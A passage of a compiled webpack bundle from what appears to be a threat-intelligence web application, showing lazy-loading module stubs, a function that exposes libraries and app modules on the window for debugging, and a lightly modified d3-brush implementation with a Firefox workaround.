/***/ (function(module, exports, __webpack_require__) {

module.exports = function(cb) {
	__webpack_require__.e/* require.ensure */(0).then((function(require) {
		cb(__webpack_require__(4145));
	}).bind(null, __webpack_require__)).catch(__webpack_require__.oe);
}

/***/ }),
/* 4047 */
/***/ (function(module, exports, __webpack_require__) {

module.exports = function(cb) {
	__webpack_require__.e/* require.ensure */(7).then((function(require) {
		cb(__webpack_require__(4146));
	}).bind(null, __webpack_require__)).catch(__webpack_require__.oe);
}

/***/ }),
/* 4048 */
/***/ (function(module, exports, __webpack_require__) {

module.exports = function(cb) {
	__webpack_require__.e/* require.ensure */(1).then((function(require) {
		cb(__webpack_require__(4147));
	}).bind(null, __webpack_require__)).catch(__webpack_require__.oe);
}

/***/ }),
/* 4049 */
/***/ (function(module, exports, __webpack_require__) {

module.exports = function(cb) {
	__webpack_require__.e/* require.ensure */(16).then((function(require) {
		cb(__webpack_require__(4148));
	}).bind(null, __webpack_require__)).catch(__webpack_require__.oe);
}

/***/ }),
/* 4050 */
/***/ (function(module, exports, __webpack_require__) {

module.exports = function(cb) {
	__webpack_require__.e/* require.ensure */(13).then((function(require) {
		cb(__webpack_require__(4149));
	}).bind(null, __webpack_require__)).catch(__webpack_require__.oe);
}

/***/ }),
/* 4051 */
/***/ (function(module, exports, __webpack_require__) {

module.exports = function(cb) {
	__webpack_require__.e/* require.ensure */(12).then((function(require) {
		cb(__webpack_require__(4150));
	}).bind(null, __webpack_require__)).catch(__webpack_require__.oe);
}

/***/ }),
/* 4052 */
/***/ (function(module, exports, __webpack_require__) {

module.exports = function(cb) {
	__webpack_require__.e/* require.ensure */(14).then((function(require) {
		cb(__webpack_require__(4151));
	}).bind(null, __webpack_require__)).catch(__webpack_require__.oe);
}

/***/ }),
/* 4053 */
/***/ (function(module, exports, __webpack_require__) {

module.exports = function(cb) {
	__webpack_require__.e/* require.ensure */(15).then((function(require) {
		cb(__webpack_require__(4152));
	}).bind(null, __webpack_require__)).catch(__webpack_require__.oe);
}

/***/ }),
/* 4054 */
/***/ (function(module, exports, __webpack_require__) {

module.exports = function(cb) {
	__webpack_require__.e/* require.ensure */(27).then((function(require) {
		cb(__webpack_require__(4153));
	}).bind(null, __webpack_require__)).catch(__webpack_require__.oe);
}

/***/ }),
/* 4055 */
/***/ (function(module, exports, __webpack_require__) {

module.exports = function(cb) {
	__webpack_require__.e/* require.ensure */(28).then((function(require) {
		cb(__webpack_require__(4154));
	}).bind(null, __webpack_require__)).catch(__webpack_require__.oe);
}

/***/ }),
/* 4056 */
/***/ (function(module, exports, __webpack_require__) {

module.exports = function(cb) {
	__webpack_require__.e/* require.ensure */(3).then((function(require) {
		cb(__webpack_require__(4155));
	}).bind(null, __webpack_require__)).catch(__webpack_require__.oe);
}

/***/ }),
/* 4057 */
/***/ (function(module, exports, __webpack_require__) {

module.exports = function(cb) {
	__webpack_require__.e/* require.ensure */(8).then((function(require) {
		cb(__webpack_require__(4156));
	}).bind(null, __webpack_require__)).catch(__webpack_require__.oe);
}

/***/ }),
/* 4058 */
/***/ (function(module, exports, __webpack_require__) {

module.exports = function(cb) {
	__webpack_require__.e/* require.ensure */(9).then((function(require) {
		cb(__webpack_require__(4157));
	}).bind(null, __webpack_require__)).catch(__webpack_require__.oe);
}

/***/ }),
/* 4059 */
/***/ (function(module, exports, __webpack_require__) {

module.exports = function(cb) {
	__webpack_require__.e/* require.ensure */(30).then((function(require) {
		cb(__webpack_require__(4158));
	}).bind(null, __webpack_require__)).catch(__webpack_require__.oe);
}

/***/ }),
/* 4060 */
/***/ (function(module, exports, __webpack_require__) {

module.exports = function(cb) {
	__webpack_require__.e/* require.ensure */(31).then((function(require) {
		cb(__webpack_require__(4159));
	}).bind(null, __webpack_require__)).catch(__webpack_require__.oe);
}

/***/ }),
/* 4061 */
/***/ (function(module, exports, __webpack_require__) {

module.exports = function(cb) {
	__webpack_require__.e/* require.ensure */(18).then((function(require) {
		cb(__webpack_require__(4160));
	}).bind(null, __webpack_require__)).catch(__webpack_require__.oe);
}

/***/ }),
/* 4062 */
/***/ (function(module, exports, __webpack_require__) {

module.exports = function(cb) {
	__webpack_require__.e/* require.ensure */(11).then((function(require) {
		cb(__webpack_require__(4161));
	}).bind(null, __webpack_require__)).catch(__webpack_require__.oe);
}

/***/ }),
/* 4063 */
/***/ (function(module, exports, __webpack_require__) {

module.exports = function(cb) {
	__webpack_require__.e/* require.ensure */(22).then((function(require) {
		cb(__webpack_require__(4162));
	}).bind(null, __webpack_require__)).catch(__webpack_require__.oe);
}

/***/ }),
/* 4064 */
/***/ (function(module, exports, __webpack_require__) {

module.exports = function(cb) {
	__webpack_require__.e/* require.ensure */(35).then((function(require) {
		cb(__webpack_require__(4163));
	}).bind(null, __webpack_require__)).catch(__webpack_require__.oe);
}

/***/ }),
/* 4065 */
/***/ (function(module, exports, __webpack_require__) {

module.exports = function(cb) {
	__webpack_require__.e/* require.ensure */(36).then((function(require) {
		cb(__webpack_require__(4164));
	}).bind(null, __webpack_require__)).catch(__webpack_require__.oe);
}

/***/ }),
/* 4066 */
/***/ (function(module, exports, __webpack_require__) {

module.exports = function(cb) {
	__webpack_require__.e/* require.ensure */(19).then((function(require) {
		cb(__webpack_require__(4165));
	}).bind(null, __webpack_require__)).catch(__webpack_require__.oe);
}

/***/ }),
/* 4067 */
/***/ (function(module, exports, __webpack_require__) {

module.exports = function(cb) {
	__webpack_require__.e/* require.ensure */(21).then((function(require) {
		cb(__webpack_require__(4166));
	}).bind(null, __webpack_require__)).catch(__webpack_require__.oe);
}

/***/ }),
/* 4068 */
/***/ (function(module, exports, __webpack_require__) {

module.exports = function(cb) {
	__webpack_require__.e/* require.ensure */(24).then((function(require) {
		cb(__webpack_require__(4167));
	}).bind(null, __webpack_require__)).catch(__webpack_require__.oe);
}

/***/ }),
/* 4069 */
/***/ (function(module, exports, __webpack_require__) {

module.exports = function(cb) {
	__webpack_require__.e/* require.ensure */(23).then((function(require) {
		cb(__webpack_require__(4168));
	}).bind(null, __webpack_require__)).catch(__webpack_require__.oe);
}

/***/ }),
/* 4070 */
/***/ (function(module, exports, __webpack_require__) {

module.exports = function(cb) {
	__webpack_require__.e/* require.ensure */(37).then((function(require) {
		cb(__webpack_require__(4169));
	}).bind(null, __webpack_require__)).catch(__webpack_require__.oe);
}

/***/ }),
/* 4071 */
/***/ (function(module, exports, __webpack_require__) {

module.exports = function(cb) {
	__webpack_require__.e/* require.ensure */(32).then((function(require) {
		cb(__webpack_require__(4170));
	}).bind(null, __webpack_require__)).catch(__webpack_require__.oe);
}

/***/ }),
/* 4072 */
/***/ (function(module, exports, __webpack_require__) {

module.exports = function(cb) {
	__webpack_require__.e/* require.ensure */(34).then((function(require) {
		cb(__webpack_require__(4171));
	}).bind(null, __webpack_require__)).catch(__webpack_require__.oe);
}

/***/ }),
/* 4073 */
/***/ (function(module, exports, __webpack_require__) {

module.exports = function(cb) {
	__webpack_require__.e/* require.ensure */(33).then((function(require) {
		cb(__webpack_require__(4172));
	}).bind(null, __webpack_require__)).catch(__webpack_require__.oe);
}

/***/ }),
/* 4074 */
/***/ (function(module, exports, __webpack_require__) {

module.exports = function(cb) {
	__webpack_require__.e/* require.ensure */(6).then((function(require) {
		cb(__webpack_require__(4173));
	}).bind(null, __webpack_require__)).catch(__webpack_require__.oe);
}

/***/ }),
/* 4075 */
/***/ (function(module, exports, __webpack_require__) {

/* eslint-disable global-require, flowtype/require-valid-file-annotation, no-console */
var Immutable = __webpack_require__(1);

module.exports = function exposeGlobals(root, other) {
  // Expose anything else passed in on the window. Namely the redux store
  Object.assign(root, other);

  // NOTE: This was not named "d3" because i wanted to avoid accidentally
  // missing errors related to removing the d3 package since they would be
  // picked up in dev by the global d3 but not in prod
  root._d3 = Object.assign({}, __webpack_require__(411), __webpack_require__(898), __webpack_require__(913), __webpack_require__(218), __webpack_require__(303), __webpack_require__(69), __webpack_require__(414), __webpack_require__(103), __webpack_require__(4076), __webpack_require__(341), __webpack_require__(680), __webpack_require__(342), __webpack_require__(254));
  root.transit = __webpack_require__(976);
  root.reactStringReplace = __webpack_require__(727);
  root.R = __webpack_require__(8);
  root.dateFns = __webpack_require__(739);
  root.moment = __webpack_require__(141);
  root.ReduxForm = __webpack_require__(180);
  root.ms = __webpack_require__(216);
  root.Rx = __webpack_require__(14);
  root.Obs = root.Rx.Observable;
  root.bowser = __webpack_require__(328);
  root.escapeRegExp = __webpack_require__(123);
  root.storage = __webpack_require__(4081);
  root.trutils = __webpack_require__(78);
  root.createTween = __webpack_require__(1667).default;
  root.trustar = {
    fp: __webpack_require__(109),
    utils: Object.assign({}, __webpack_require__(5), __webpack_require__(78)),
    graphUtils: __webpack_require__(408)
  };
  // Useful for debugging state/prop updates within components
  root.diff = root.trustar.utils.diff;

  root.App = __webpack_require__(179);
  root.Alerts = __webpack_require__(400);
  root.Analysis = __webpack_require__(565);
  root.Reports = __webpack_require__(558);
  root.Display = __webpack_require__(883);
  root.Profile = __webpack_require__(140);
  root.GlobalWhitelist = __webpack_require__(907);
  root.CompanyWhitelist = __webpack_require__(562);
  root.Search = __webpack_require__(253);
  root.Create = __webpack_require__(884);
  root.DevTasks = __webpack_require__(901);
  root.Enclave = __webpack_require__(296);
  root.EnclaveManagement = __webpack_require__(887);
  root.Icons = __webpack_require__(1310);
  root.Templates = __webpack_require__(885);
  root.Marketplace = __webpack_require__(902);
  root.SubscriptionManagement = __webpack_require__(564);
  root.Subscriptions = __webpack_require__(407);
  root.Redaction = __webpack_require__(890);
  root.Companies = __webpack_require__(402);
  root.Users = __webpack_require__(881);
  root.Roles = __webpack_require__(897);
  root.Tags = __webpack_require__(878);
  root.Sectors = __webpack_require__(566);
  root.Insights = __webpack_require__(572);
  root.Metrics = __webpack_require__(1327);
  root.Indicators = __webpack_require__(560);
  root.Settings = __webpack_require__(567);
  root.Groups = __webpack_require__(889);
  root.Miscellaneous = __webpack_require__(888);
  root.DataFeeds = __webpack_require__(298);
  root.Malware = __webpack_require__(903);
  root.ThreatActors = __webpack_require__(904);

  // Set up Immutable devtools
  __webpack_require__(4082)(Immutable);

  // NOTE: For some reason everything breaks if we add Immutable to window
  // _before_ calling immutable-devtools
  root.Im = Immutable;
};

/***/ }),
/* 4076 */
/***/ (function(module, __webpack_exports__, __webpack_require__) {

"use strict";
Object.defineProperty(__webpack_exports__, "__esModule", { value: true });
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_0__src_brush__ = __webpack_require__(4077);
/* harmony reexport (binding) */ __webpack_require__.d(__webpack_exports__, "brush", function() { return __WEBPACK_IMPORTED_MODULE_0__src_brush__["d"]; });
/* harmony reexport (binding) */ __webpack_require__.d(__webpack_exports__, "brushX", function() { return __WEBPACK_IMPORTED_MODULE_0__src_brush__["b"]; });
/* harmony reexport (binding) */ __webpack_require__.d(__webpack_exports__, "brushY", function() { return __WEBPACK_IMPORTED_MODULE_0__src_brush__["c"]; });
/* harmony reexport (binding) */ __webpack_require__.d(__webpack_exports__, "brushSelection", function() { return __WEBPACK_IMPORTED_MODULE_0__src_brush__["a"]; });


/***/ }),
/* 4077 */
/***/ (function(module, __webpack_exports__, __webpack_require__) {

"use strict";
/* harmony export (immutable) */ __webpack_exports__["a"] = brushSelection;
/* harmony export (immutable) */ __webpack_exports__["b"] = brushX;
/* harmony export (immutable) */ __webpack_exports__["c"] = brushY;
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_0_d3_dispatch__ = __webpack_require__(255);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_1_d3_drag__ = __webpack_require__(411);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_2_d3_interpolate__ = __webpack_require__(120);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_3_d3_selection__ = __webpack_require__(69);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_4_d3_transition__ = __webpack_require__(414);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_5__constant__ = __webpack_require__(4078);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_6__event__ = __webpack_require__(4079);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_7__noevent__ = __webpack_require__(4080);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_8_bowser__ = __webpack_require__(328);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_8_bowser___default = __webpack_require__.n(__WEBPACK_IMPORTED_MODULE_8_bowser__);
/* eslint-disable quotes,flowtype/require-valid-file-annotation,indent,no-var,no-unused-expressions,curly */
/**
 * All the eslint ignores above are because much of this file was taken directly
 * from the d3-brush repo and it didn't seem worthwhile to modify to to address
 * all of our linting preferences
 */










/* Custom selection helpers. See note above `point` for more info.
 * ======================================================================= */

var sourceEvent = function sourceEvent() {
  var current = __WEBPACK_IMPORTED_MODULE_3_d3_selection__["event"],
      source = void 0;
  while (source = current.sourceEvent) {
    current = source;
  } // eslint-disable-line no-cond-assign
  return current;
};

/**
 * NOTE: There is a bug in firefox (as of 2017-11-09) which causes unexpected
 * behavior when using `getScreenCTM`. Seems to have something to do with not
 * accounting for transforms. However, perhaps it is something relating to a
 * viewbox attribute missing from the root svg element. Either way, checking for
 * firefox is the fix for us. Bostock has marked this particular bug as a
 * wontfix: https://github.com/d3/d3-selection/issues/81
 *
 * Also see the trello card for more context:
 * https://trello.com/c/FihQzo4R/2091-firefox-timeline-slider-bugs-bug
 */
var point = function point(node, event) {
  var svg = node.ownerSVGElement || node;

  if (svg.createSVGPoint && !__WEBPACK_IMPORTED_MODULE_8_bowser___default.a.firefox) {
    // See NOTE
    var _point = svg.createSVGPoint();
    _point.x = event.clientX, _point.y = event.clientY;
    _point = _point.matrixTransform(node.getScreenCTM().inverse());
    return [_point.x, _point.y];
  }

  var rect = node.getBoundingClientRect();
  return [event.clientX - rect.left - node.clientLeft, event.clientY - rect.top - node.clientTop];
};

var mouse = function mouse(node) {
  var event = sourceEvent();
  if (event.changedTouches) event = event.changedTouches[0];
  return point(node, event);
};

/* =======================================================================
 * END Custom selection helpers */

var MODE_DRAG = { name: "drag" },
    MODE_SPACE = { name: "space" },
    MODE_HANDLE = { name: "handle" },
    MODE_CENTER = { name: "center" };

var X = {
  name: "x",
  handles: ["e", "w"].map(type),
  input: function input(x, e) {
    return x && [[x[0], e[0][1]], [x[1], e[1][1]]];
  },
  output: function output(xy) {
    return xy && [xy[0][0], xy[1][0]];
  }
};

var Y = {
  name: "y",
  handles: ["n", "s"].map(type),
  input: function input(y, e) {
    return y && [[e[0][0], y[0]], [e[1][0], y[1]]];
  },
  output: function output(xy) {
    return xy && [xy[0][1], xy[1][1]];
  }
};

var XY = {
  name: "xy",
  handles: ["n", "e", "s", "w", "nw", "ne", "se", "sw"].map(type),
  input: function input(xy) {
    return xy;
  },
  output: function output(xy) {
    return xy;
  }
};

var cursors = {
  overlay: "crosshair",
  selection: "move",
  n: "ns-resize",
  e: "ew-resize",
  s: "ns-resize",
  w: "ew-resize",
  nw: "nwse-resize",
  ne: "nesw-resize",
  se: "nwse-resize",
  sw: "nesw-resize"
};

var flipX = {
  e: "w",
  w: "e",
  nw: "ne",
  ne: "nw",
  se: "sw",
  sw: "se"
};

var flipY = {
  n: "s",
  s: "n",
  nw: "sw",
  ne: "se",
  se: "ne",
  sw: "nw"
};

var signsX = {
  overlay: +1,
  selection: +1,
  n: null,
  e: +1,
  s: null,
  w: -1,
  nw: -1,
  ne: +1,
  se: +1,
  sw: -1
};

var signsY = {
  overlay: +1,
  selection: +1,
  n: -1,
  e: null,
  s: +1,
  w: null,
  nw: -1,
  ne: -1,
  se: +1,
  sw: +1
};

function type(t) {
  return { type: t };
}

// Ignore right-click, since that should open the context menu.
function defaultFilter() {
  return !__WEBPACK_IMPORTED_MODULE_3_d3_selection__["event"].button;
}

function defaultExtent() {
  var svg = this.ownerSVGElement || this;
  return [[0, 0], [svg.width.baseVal.value, svg.height.baseVal.value]];
}

// Like d3.local, but with the name “__brush” rather than auto-generated.
function local(node) {
  while (!node.__brush) {
    if (!(node = node.parentNode)) return;
  }return node.__brush;
}

function empty(extent) {
  return extent[0][0] === extent[1][0] || extent[0][1] === extent[1][1];
}

function brushSelection(node) {
  var state = node.__brush;
  return state ? state.dim.output(state.selection) : null;
}

function brushX() {
  return brush(X);
}

function brushY() {
  return brush(Y);
}

/* harmony default export */ __webpack_exports__["d"] = (function () {
  return brush(XY);
});

function brush(dim) {
  var extent = defaultExtent,
      filter = defaultFilter,
      listeners = Object(__WEBPACK_IMPORTED_MODULE_0_d3_dispatch__["dispatch"])(brush, "start", "brush", "end"),
      handleSize = 6,
      touchending;

  function brush(group) {
    var overlay = group.property("__brush", initialize).selectAll(".overlay").data([type("overlay")]);

    overlay.enter().append("rect").attr("class", "overlay").attr("pointer-events", "all").attr("cursor", cursors.overlay).merge(overlay).each(function () {
      var extent = local(this).extent;
      Object(__WEBPACK_IMPORTED_MODULE_3_d3_selection__["select"])(this).attr("x", extent[0][0]).attr("y", extent[0][1]).attr("width", extent[1][0] - extent[0][0]).attr("height", extent[1][1] - extent[0][1]);
    });

    group.selectAll(".selection").data([{ type: "selection" }]).enter().append("rect").attr("class", "selection").attr("cursor", cursors.selection)
    // .attr("fill", "#777")
    // .attr("fill-opacity", 0.3)
    // .attr("stroke", "#fff")
    .attr("shape-rendering", "crispEdges");

    var handle = group.selectAll(".handle").data(dim.handles, function (d) {
      return d.type;
    });

    handle.exit().remove();

    handle.enter().append("rect").attr("class", function (d) {
      return "handle handle--" + d.type;
    }).attr("cursor", function (d) {
      return cursors[d.type];
    });

    group.each(redraw).attr("fill", "none").attr("pointer-events", "all").style("-webkit-tap-highlight-color", "rgba(0,0,0,0)").on("mousedown.brush touchstart.brush", started);
  }

  brush.move = function (group, selection) {
    if (group.selection) {
      group.on("start.brush", function () {
        emitter(this, arguments).beforestart().start();
      }).on("interrupt.brush end.brush", function () {
        emitter(this, arguments).end();
      }).tween("brush", function () {
        var that = this,
            state = that.__brush,
            emit = emitter(that, arguments),
            selection0 = state.selection,
            selection1 = dim.input(typeof selection === "function" ? selection.apply(this, arguments) : selection, state.extent),
            i = Object(__WEBPACK_IMPORTED_MODULE_2_d3_interpolate__["interpolate"])(selection0, selection1);

        function tween(t) {
          state.selection = t === 1 && empty(selection1) ? null : i(t);
          redraw.call(that);
          emit.brush();
        }

        return selection0 && selection1 ? tween : tween(1);
      });
    } else {
      group.each(function () {
        var that = this,
            args = arguments,
            state = that.__brush,
            selection1 = dim.input(typeof selection === "function" ? selection.apply(that, args) : selection, state.extent),
            emit = emitter(that, args).beforestart();

        Object(__WEBPACK_IMPORTED_MODULE_4_d3_transition__["interrupt"])(that);
        state.selection = selection1 == null || empty(selection1) ? null : selection1;
        redraw.call(that);
        emit.start().brush().end();
      });
    }
  };

  function redraw() {
    var group = Object(__WEBPACK_IMPORTED_MODULE_3_d3_selection__["select"])(this),
        selection = local(this).selection;

    if (selection) {
      group.selectAll(".selection").style("display", null).attr("x", selection[0][0]).attr("y", selection[0][1]).attr("width", selection[1][0] - selection[0][0]).attr("height", selection[1][1] - selection[0][1]);

      group.selectAll(".handle").style("display", null).attr("x", function (d) {
        return d.type[d.type.length - 1] === "e" ? selection[1][0] - handleSize / 2 : selection[0][0] - handleSize / 2;
      }).attr("y", function (d) {
        return d.type[0] === "s" ? selection[1][1] - handleSize / 2 : selection[0][1] - handleSize / 2;
      }).attr("width", function (d) {
        return d.type === "n" || d.type === "s" ? selection[1][0] - selection[0][0] + handleSize : handleSize;
      }).attr("height", function (d) {
        return d.type === "e" || d.type === "w" ? selection[1][1] - selection[0][1] + handleSize : handleSize;
      });
    } else {
      group.selectAll(".selection,.handle").style("display", "none").attr("x", null).attr("y", null).attr("width", null).attr("height", null);
    }
  }

  function emitter(that, args) {
    return that.__brush.emitter || new Emitter(that, args);
  }

  function Emitter(that, args) {
    this.that = that;
    this.args = args;
    this.state = that.__brush;
    this.active = 0;
  }

  Emitter.prototype = {
    beforestart: function beforestart() {
      if (++this.active === 1) this.state.emitter = this, this.starting = true;
      return this;
    },
    start: function start() {
      if (this.starting) this.starting = false, this.emit("start");
      return this;
    },
    brush: function brush() {
      this.emit("brush");
      return this;
    },
    end: function end() {
      if (--this.active === 0) delete this.state.emitter, this.emit("end");
      return this;
    },
    emit: function emit(type) {
      Object(__WEBPACK_IMPORTED_MODULE_3_d3_selection__["customEvent"])(new __WEBPACK_IMPORTED_MODULE_6__event__["a" /* default */](brush, type, dim.output(this.state.selection)), listeners.apply, listeners, [type, this.that, this.args]);
    }
  };

  function started() {
    if (__WEBPACK_IMPORTED_MODULE_3_d3_selection__["event"].touches) {
      if (__WEBPACK_IMPORTED_MODULE_3_d3_selection__["event"].changedTouches.length < __WEBPACK_IMPORTED_MODULE_3_d3_selection__["event"].touches.length) return Object(__WEBPACK_IMPORTED_MODULE_7__noevent__["a" /* default */])();
    } else if (touchending) return;
    if (!filter.apply(this, arguments)) return;

    var that = this,
        type = __WEBPACK_IMPORTED_MODULE_3_d3_selection__["event"].target.__data__.type,
        mode = (__WEBPACK_IMPORTED_MODULE_3_d3_selection__["event"].metaKey ? type = "overlay" : type) === "selection" ? MODE_DRAG : __WEBPACK_IMPORTED_MODULE_3_d3_selection__["event"].altKey ? MODE_CENTER : MODE_HANDLE,
        signX = dim === Y ? null : signsX[type],
        signY = dim === X ? null : signsY[type],
        state = local(that),
        extent = state.extent,
        selection = state.selection,
        W = extent[0][0],
        w0,
        w1,
        N = extent[0][1],
        n0,
        n1,
        E = extent[1][0],
        e0,
        e1,
        S = extent[1][1],
        s0,
        s1,
        dx,
        dy,
        moving,
        shifting = signX && signY && __WEBPACK_IMPORTED_MODULE_3_d3_selection__["event"].shiftKey,
        lockX,
        lockY,
        point0 = mouse(that),
        // NOTE: This line is what led to the the bug mentioned in the custom select helpers at the top
    point = point0,
        emit = emitter(that, arguments).beforestart();

    // NOTE: Not sure if this was a d3 bug or a bug in our usage of the brush,
    // but selection was undefined while type was not 'overlay' so I added this
    // quick check to account for that.
    if (type === 'overlay' || !selection) {
      state.selection = selection = [[w0 = dim === Y ? W : point0[0], n0 = dim === X ? N : point0[1]], [e0 = dim === Y ? E : w0, s0 = dim === X ? S : n0]];
    } else {
      w0 = selection[0][0];
      n0 = selection[0][1];
      e0 = selection[1][0];
      s0 = selection[1][1];
    }

    w1 = w0;
    n1 = n0;
    e1 = e0;
    s1 = s0;

    var group = Object(__WEBPACK_IMPORTED_MODULE_3_d3_selection__["select"])(that).attr("pointer-events", "none");

    var overlay = group.selectAll(".overlay").attr("cursor", cursors[type]);

    if (__WEBPACK_IMPORTED_MODULE_3_d3_selection__["event"].touches) {
      group.on("touchmove.brush", moved, true).on("touchend.brush touchcancel.brush", ended, true);
    } else {
      var view = Object(__WEBPACK_IMPORTED_MODULE_3_d3_selection__["select"])(__WEBPACK_IMPORTED_MODULE_3_d3_selection__["event"].view).on("keydown.brush", keydowned, true).on("keyup.brush", keyupped, true).on("mousemove.brush", moved, true).on("mouseup.brush", ended, true);

      Object(__WEBPACK_IMPORTED_MODULE_1_d3_drag__["dragDisable"])(__WEBPACK_IMPORTED_MODULE_3_d3_selection__["event"].view);
    }

    Object(__WEBPACK_IMPORTED_MODULE_7__noevent__["b" /* nopropagation */])();
    Object(__WEBPACK_IMPORTED_MODULE_4_d3_transition__["interrupt"])(that);
    redraw.call(that);
    emit.start();

    function moved() {
      var point1 = mouse(that);
      if (shifting && !lockX && !lockY) {
        if (Math.abs(point1[0] - point[0]) > Math.abs(point1[1] - point[1])) lockY = true;else lockX = true;
      }
      point = point1;
      moving = true;
      Object(__WEBPACK_IMPORTED_MODULE_7__noevent__["a" /* default */])();
      move();
    }

    function move() {
      var t;

      dx = point[0] - point0[0];
      dy = point[1] - point0[1];

      switch (mode) {
        case MODE_SPACE:
        case MODE_DRAG:
          {
            if (signX) dx = Math.max(W - w0, Math.min(E - e0, dx)), w1 = w0 + dx, e1 = e0 + dx;
            if (signY) dy = Math.max(N - n0, Math.min(S - s0, dy)), n1 = n0 + dy, s1 = s0 + dy;
            break;
          }
        case MODE_HANDLE:
          {
            if (signX < 0) dx = Math.max(W - w0, Math.min(E - w0, dx)), w1 = w0 + dx, e1 = e0;else if (signX > 0) dx = Math.max(W - e0, Math.min(E - e0, dx)), w1 = w0, e1 = e0 + dx;
            if (signY < 0) dy = Math.max(N - n0, Math.min(S - n0, dy)), n1 = n0 + dy, s1 = s0;else if (signY > 0) dy = Math.max(N - s0, Math.min(S - s0, dy)), n1 = n0, s1 = s0 + dy;
            break;
          }
        case MODE_CENTER:
          {
            if (signX) w1 = Math.max(W, Math.min(E, w0 - dx * signX)), e1 = Math.max(W, Math.min(E, e0 + dx * signX));
            if (signY) n1 = Math.max(N, Math.min(S, n0 - dy * signY)), s1 = Math.max(N, Math.min(S, s0 + dy * signY));
            break;
          }
      }

      if (e1 < w1) {
        signX *= -1;
        t = w0, w0 = e0, e0 = t;
        t = w1, w1 = e1, e1 = t;
        if (type in flipX) overlay.attr("cursor", cursors[type = flipX[type]]);
      }

      if (s1 < n1) {
        signY *= -1;
        t = n0, n0 = s0, s0 = t;
        t = n1, n1 = s1, s1 = t;
        if (type in flipY) overlay.attr("cursor", cursors[type = flipY[type]]);
      }

      if (state.selection) selection = state.selection; // May be set by brush.move!
      if (lockX) w1 = selection[0][0], e1 = selection[1][0];
      if (lockY) n1 = selection[0][1], s1 = selection[1][1];

      if (selection[0][0] !== w1 || selection[0][1] !== n1 || selection[1][0] !== e1 || selection[1][1] !== s1) {
        state.selection = [[w1, n1], [e1, s1]];
        redraw.call(that);
        emit.brush();
      }
    }

    function ended() {
      Object(__WEBPACK_IMPORTED_MODULE_7__noevent__["b" /* nopropagation */])();
      if (__WEBPACK_IMPORTED_MODULE_3_d3_selection__["event"].touches) {
        if (__WEBPACK_IMPORTED_MODULE_3_d3_selection__["event"].touches.length) return;
        if (touchending) clearTimeout(touchending);
        touchending = setTimeout(function () {
          touchending = null;
        }, 500); // Ghost clicks are delayed!
        group.on("touchmove.brush touchend.brush touchcancel.brush", null);
      } else {
        Object(__WEBPACK_IMPORTED_MODULE_1_d3_drag__["dragEnable"])(__WEBPACK_IMPORTED_MODULE_3_d3_selection__["event"].view, moving);
        view.on("keydown.brush keyup.brush mousemove.brush mouseup.brush", null);
      }
      group.attr("pointer-events", "all");
      overlay.attr("cursor", cursors.overlay);
      if (state.selection) selection = state.selection; // May be set by brush.move (on start)!
      if (empty(selection)) state.selection = null, redraw.call(that);
      emit.end();
    }

    function keydowned() {
      switch (__WEBPACK_IMPORTED_MODULE_3_d3_selection__["event"].keyCode) {
        case 16:
          {
            // SHIFT
            shifting = signX && signY;
            break;
          }
        case 18:
          {
            // ALT
            if (mode === MODE_HANDLE) {
              if (signX) e0 = e1 - dx * signX, w0 = w1 + dx * signX;
              if (signY) s0 = s1 - dy * signY, n0 = n1 + dy * signY;
              mode = MODE_CENTER;
              move();
            }
            break;
          }
        case 32:
          {
            // SPACE; takes priority over ALT
            if (mode === MODE_HANDLE || mode === MODE_CENTER) {
              if (signX < 0) e0 = e1 - dx;else if (signX > 0) w0 = w1 - dx;
              if (signY < 0) s0 = s1 - dy;else if (signY > 0) n0 = n1 - dy;
              mode = MODE_SPACE;
              overlay.attr("cursor", cursors.selection);
              move();
            }
            break;
          }
        default:
          return;
      }
      Object(__WEBPACK_IMPORTED_MODULE_7__noevent__["a" /* default */])();
    }

    function keyupped() {
      switch (__WEBPACK_IMPORTED_MODULE_3_d3_selection__["event"].keyCode) {
        case 16:
          {
            // SHIFT
            if (shifting) {
              lockX = lockY = shifting = false;
              move();
            }
            break;
          }
        case 18:
          {
            // ALT
            if (mode === MODE_CENTER) {
              if (signX < 0) e0 = e1;else if (signX > 0) w0 = w1;
              if (signY < 0) s0 = s1;else if (signY > 0) n0 = n1;
              mode = MODE_HANDLE;
              move();
            }
            break;
          }
        case 32:
          {
            // SPACE
            if (mode === MODE_SPACE) {
              if (__WEBPACK_IMPORTED_MODULE_3_d3_selection__["event"].altKey) {
                if (signX) e0 = e1 - dx * signX, w0 = w1 + dx * signX;
                if (signY) s0 = s1 - dy * signY, n0 = n1 + dy * signY;
                mode = MODE_CENTER;
              } else {
                if (signX < 0) e0 = e1;else if (signX > 0) w0 = w1;
                if (signY < 0) s0 = s1;else if (signY > 0) n0 = n1;
                mode = MODE_HANDLE;
              }
              overlay.attr("cursor", cursors[type]);
              move();
            }
            break;
          }
        default:
          return;
      }
      Object(__WEBPACK_IMPORTED_MODULE_7__noevent__["a" /* default */])();
    }
  }

  function initialize() {
    var state = this.__brush || { selection: null };
    state.extent = extent.apply(this, arguments);
    state.dim = dim;
    return state;
  }

  brush.extent = function (_) {
    return arguments.length ? (extent = typeof _ === "function" ? _ : Object(__WEBPACK_IMPORTED_MODULE_5__constant__["a" /* default */])([[+_[0][0], +_[0][1]], [+_[1][0], +_[1][1]]]), brush) : extent;
  };

  brush.filter = function (_) {
    return arguments.length ? (filter = typeof _ === "function" ? _ : Object(__WEBPACK_IMPORTED_MODULE_5__constant__["a" /* default */])(!!_), brush) : filter;
  };

  brush.handleSize = function (_) {
    return arguments.length ? (handleSize = +_, brush) : handleSize;
  };

  brush.on = function () {
    var value = listeners.on.apply(listeners, arguments);
    return value === listeners ? brush : value;
  };

  return brush;
}

/***/ }),
/* 4078 */
/***/ (function(module, __webpack_exports__, __webpack_require__) {

"use strict";
/* eslint-disable quotes,flowtype/require-valid-file-annotation,indent,no-var,no-unused-expressions,curly */
/* harmony default export */ __webpack_exports__["a"] = (function (x) {
  return function () {
    return x;
  };
});

/***/ }),
/* 4079 */
/***/ (function(module, __webpack_exports__, __webpack_require__) {

"use strict";
